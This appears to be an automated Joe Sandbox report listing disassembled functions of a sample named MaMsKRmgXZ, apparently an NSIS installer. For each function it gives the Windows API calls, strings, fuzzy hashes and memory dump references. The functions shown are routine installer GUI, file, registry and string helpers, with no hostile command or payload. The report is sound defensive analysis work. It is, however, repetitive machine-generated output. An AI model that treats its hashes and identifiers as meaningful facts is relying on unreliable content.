Opcode Fuzzy Hash: b655f89ca4bb62ef2ecf269f26a72b4f16410e1a4a94cceed0b0bba942de31e0
Instruction Fuzzy Hash: DA018071D40218BAEB00DB94DC81BFEBBB8AB45B11F10412BBA00B61D0C7B469418BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00401DFF Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401E02
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E1C
MulDiv.KERNEL32(00000000,00000000), ref: 00401E24
ReleaseDC.USER32(?,00000000), ref: 00401E35
CreateFontIndirectA.GDI32(0040A7E8), ref: 00401E84

Strings

Calibri, xrefs: 00401E6A

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: Calibri
API String ID: 3808545654-1409258342
Opcode ID: 02699fb8e5746cd42e9bc81a7398f0b4a801f797f07dd38d0fd2bed2daf6de53
Instruction ID: f74e6b169c59b5c86824efe7ff79e827475fcd3c365d9a6f340974a330803a43
Opcode Fuzzy Hash: 02699fb8e5746cd42e9bc81a7398f0b4a801f797f07dd38d0fd2bed2daf6de53
Instruction Fuzzy Hash: 6001B571948341AFE7019BB0AE49F9A7FB4EB15304F108479F201B72E2C6B851509B2F

Uniqueness

Uniqueness Score: -1.00%

Function 00402CDD Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402CF8
MulDiv.KERNEL32(0012CFD5,00000064,0012EA18), ref: 00402D23
wsprintfA.USER32 ref: 00402D33
SetWindowTextA.USER32(?,?), ref: 00402D43
SetDlgItemTextA.USER32(?,00000406,?), ref: 00402D55

Strings

verifying installer: %d%%, xrefs: 00402D2D

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: be9cfeef7a30176cc4b43e70d30b18a0c7ce5305aee0f330691da59d71d99e6c
Instruction ID: 989b2dafafbc5add767bef13d928cf85595003a1ad1b8b7172a09c7de12a9e27
Opcode Fuzzy Hash: be9cfeef7a30176cc4b43e70d30b18a0c7ce5305aee0f330691da59d71d99e6c
Instruction Fuzzy Hash: 3801EC71A40209ABEF20AF60DD49FAE3769EB04305F008039FA06AA1D0D7B599558F59

Uniqueness

Uniqueness Score: -1.00%

Function 6EC022F1 Relevance: 9.1, APIs: 6, Instructions: 140memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 6EC02447

Part of subcall function 6EC01224: lstrcpynA.KERNEL32(00000000,?,6EC012CF,-6EC0404B,6EC011AB,-000000A0), ref: 6EC01234

GlobalAlloc.KERNEL32(00000040,?), ref: 6EC023C2
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 6EC023D7
GlobalAlloc.KERNEL32(00000040,00000010), ref: 6EC023E8
CLSIDFromString.OLE32(00000000,00000000), ref: 6EC023F6
GlobalFree.KERNEL32(00000000), ref: 6EC023FD

Memory Dump Source

Source File: 00000000.00000002.9908323213.000000006EC01000.00000020.00000001.01000000.00000005.sdmp, Offset: 6EC00000, based on PE: true

Associated: 00000000.00000002.9908269121.000000006EC00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.9908365679.000000006EC03000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.9908406672.000000006EC05000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ec00000_MaMsKRmgXZ.jbxd

Similarity

API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
String ID:
API String ID: 3730416702-0
Opcode ID: 7d4312243161d5475bb9dbcc37e249ce987ee38c95bd2d3dc8285302168b7c30
Instruction ID: 4ac049c724b95f92c1abc454902f2da705ef4f2b29e7340d7ef82aa9e3609f53
Opcode Fuzzy Hash: 7d4312243161d5475bb9dbcc37e249ce987ee38c95bd2d3dc8285302168b7c30
Instruction Fuzzy Hash: 9D41CE71508701EFD7188FEA8854B6AB7FCFB42329F01482EE955D7292F7329A04CB61

Uniqueness

Uniqueness Score: -1.00%

Function 004027A3 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027F7
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402813
GlobalFree.KERNEL32(?), ref: 0040284C
GlobalFree.KERNEL32(00000000), ref: 0040285F
CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402877
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040288B

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 65199455fe1c80487f02215d0fef0016981626ec036ad2654a2deead1ba08cb2
Instruction ID: ec0d33f595d451752a188c19515fdbd8f87975fde9c964b970e1a5072f162152
Opcode Fuzzy Hash: 65199455fe1c80487f02215d0fef0016981626ec036ad2654a2deead1ba08cb2
Instruction Fuzzy Hash: 7D219C72C00124BBCF213FA5CD49DAE7F79EF09364B10823AF520762E0C67959419FA9

Uniqueness

Uniqueness Score: -1.00%

Function 004048B1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(Nagari Setup: Installing,Nagari Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047CC,000000DF,00000000,00000400,?), ref: 0040494F
wsprintfA.USER32 ref: 00404957
SetDlgItemTextA.USER32(?,Nagari Setup: Installing), ref: 0040496A

Strings

Nagari Setup: Installing, xrefs: 00404941, 00404946, 0040494C, 00404960
%u.%u%s%s, xrefs: 00404939

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$Nagari Setup: Installing
API String ID: 3540041739-1160857318
Opcode ID: 12f6fa3731befb5ff2bd286decedb689321e5faf0d4acc7877b9e8059f00797d
Instruction ID: 99a67daf6c97d227f7cf07030b4f4762c36886faa54bbd44db56b2f9a5a008fd
Opcode Fuzzy Hash: 12f6fa3731befb5ff2bd286decedb689321e5faf0d4acc7877b9e8059f00797d
Instruction Fuzzy Hash: 4F110D7350812937DB00656D9C45EEF328CDF85374F254637FA25F21D1EA78DC1252A8

Uniqueness

Uniqueness Score: -1.00%

Function 00401D41 Relevance: 7.6, APIs: 5, Instructions: 70windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 00401D58
GetClientRect.USER32(?,?), ref: 00401D9F
LoadImageA.USER32(?,?,?,?,?,?), ref: 00401DCD
SendMessageA.USER32(?,00000172,?,00000000), ref: 00401DDD
DeleteObject.GDI32(00000000), ref: 00401DF4

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 7c7b994fc4d91fb582f8b78dced405722323d32c4ba5efb8ea940f8c293222a4
Instruction ID: 879b8917e8c3c9b7c2a93b5436fc05cb0971dbd0d1073f8587bede8dddcc77ec
Opcode Fuzzy Hash: 7c7b994fc4d91fb582f8b78dced405722323d32c4ba5efb8ea940f8c293222a4
Instruction Fuzzy Hash: CC2196B2E04109AFDB01DF98DD44AEE7BB5FB48300F10803AF905F6290C7789941CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00405A60 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00405FDA: lstrcpynA.KERNEL32(?,?,00000400,00403307,00422F00,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FE7

Part of subcall function 00405A0B: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,?,00405A77,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,751D3410,?,C:\Users\user\AppData\Local\Temp\,004057C2,?,751D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A19
Part of subcall function 00405A0B: CharNextA.USER32(00000000), ref: 00405A1E
Part of subcall function 00405A0B: CharNextA.USER32(00000000), ref: 00405A32

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,751D3410,?,C:\Users\user\AppData\Local\Temp\,004057C2,?,751D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405AB3
GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,751D3410,?,C:\Users\user\AppData\Local\Temp\,004057C2,?,751D3410,C:\Users\user\AppData\Local\Temp\), ref: 00405AC3

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405A60
C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp, xrefs: 00405A66, 00405A6B, 00405A71, 00405AAC, 00405AB2, 00405ABA, 00405AC2

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp
API String ID: 3248276644-107744906
Opcode ID: 3d72b69990c89283bdec6022929649575e9d0056fbfb1b91cb3bf573b4946918
Instruction ID: fa13fd96d81fd76c8fc81ec80775158a1daeec84e0c55be597840f6fdc29cec0
Opcode Fuzzy Hash: 3d72b69990c89283bdec6022929649575e9d0056fbfb1b91cb3bf573b4946918
Instruction Fuzzy Hash: D5F0C825305D6616D62233361C85EAF1649CE82364715473FF851B12D3DB3C8943DE7E

Uniqueness

Uniqueness Score: -1.00%

Function 00405972 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403222,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403447,?,00000006,00000008,0000000A), ref: 00405978
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403222,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403447,?,00000006,00000008,0000000A), ref: 00405981
lstrcatA.KERNEL32(?,00409014,?,00000006,00000008,0000000A), ref: 00405992

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405972

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3355392842
Opcode ID: 76b30c2e26840082170464c0c63912d3f8204d685d5b784281808f5f32aeb92b
Instruction ID: 0da8bf888325795cdd0c5347214511d48edcf337a1f8d4df24ff951c9a6f7455
Opcode Fuzzy Hash: 76b30c2e26840082170464c0c63912d3f8204d685d5b784281808f5f32aeb92b
Instruction Fuzzy Hash: C7D0A9A2605A716AD21223199C09EDB2A0CCF02314B080063F600B22A3CA3C1D018BFE

Uniqueness

Uniqueness Score: -1.00%

Function 00402C2E Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON

Download Yara Rule

APIs

RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C93
RegCloseKey.ADVAPI32(?,?,?), ref: 00402C9C
RegCloseKey.ADVAPI32(?,?,?), ref: 00402CBD

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: Close$Enum
String ID:
API String ID: 464197530-0
Opcode ID: 73c9fb611972138edc71e9406aca9b8622a65655cc86fec515c5851ee22221db
Instruction ID: a6da729fb9552a58d385ec1c0953cf8d4b7f97d7084d0a629d1ed2eab5a533bf
Opcode Fuzzy Hash: 73c9fb611972138edc71e9406aca9b8622a65655cc86fec515c5851ee22221db
Instruction Fuzzy Hash: 8E115B32904109BBEF129F50DE09B9E7B6DEB54380F104072BE05B51E0E7B59E11AAA9

Uniqueness

Uniqueness Score: -1.00%

Function 00405A0B Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,?,00405A77,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,751D3410,?,C:\Users\user\AppData\Local\Temp\,004057C2,?,751D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A19
CharNextA.USER32(00000000), ref: 00405A1E
CharNextA.USER32(00000000), ref: 00405A32

Strings

C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp, xrefs: 00405A0C

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: CharNext
String ID: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp
API String ID: 3213498283-1038464266
Opcode ID: 41ff5f2e282a09e2b8c2dcc033aaaa44e3aa2c06707c210a0f189d2452b315e7
Instruction ID: a4ce128402f48f1feafc2c55b1118e7c053650975221e3f5fcc16cd8d0856992
Opcode Fuzzy Hash: 41ff5f2e282a09e2b8c2dcc033aaaa44e3aa2c06707c210a0f189d2452b315e7
Instruction Fuzzy Hash: 13F0C251B04F916BFB32A2280CD4F6B5B88CB55365F145267E280672C2C27C88408F9A

Uniqueness

Uniqueness Score: -1.00%

Function 00402D60 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00402F3E,00000001), ref: 00402D73
GetTickCount.KERNEL32 ref: 00402D91
CreateDialogParamA.USER32(0000006F,00000000,00402CDD,00000000), ref: 00402DAE
ShowWindow.USER32(00000000,00000005), ref: 00402DBC

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 840a75d409b371d7b77b67c1e1f99b2f4b28fbc1840826de4c71681516a351cc
Instruction ID: 88e2776c24fdb891b0502b3cf10dbd42b902845c03a9ebe61091678d0ea3e225
Opcode Fuzzy Hash: 840a75d409b371d7b77b67c1e1f99b2f4b28fbc1840826de4c71681516a351cc
Instruction Fuzzy Hash: E0F05E75905221ABCA207B62BE4CACA7BA4FB42B527014976F845B31E4C3784C868BDD

Uniqueness

Uniqueness Score: -1.00%

Function 00405075 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 004050A4
CallWindowProcA.USER32(?,?,?,?), ref: 004050F5

Part of subcall function 004040B4: SendMessageA.USER32(000103F8,00000000,00000000,00000000), ref: 004040C6

Strings

, xrefs: 00405085

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: add97a0a6925bc22265a7304b998d918bb161013fa4103ebff122d1b57fa8f8b
Instruction ID: 69794148541a1a4d8d7be296dba567d41b1ee09d4c6a2f8e6d5670bc2f98cc64
Opcode Fuzzy Hash: add97a0a6925bc22265a7304b998d918bb161013fa4103ebff122d1b57fa8f8b
Instruction Fuzzy Hash: 3F017171100649ABDF219F11DD80A9F7A65EB84314F208037FA017A2D1D77A9C51DEEA

Uniqueness

Uniqueness Score: -1.00%

Function 00405679 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421510,Error launching installer), ref: 004056A2
CloseHandle.KERNEL32(?), ref: 004056AF

Strings

Error launching installer, xrefs: 0040568C

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
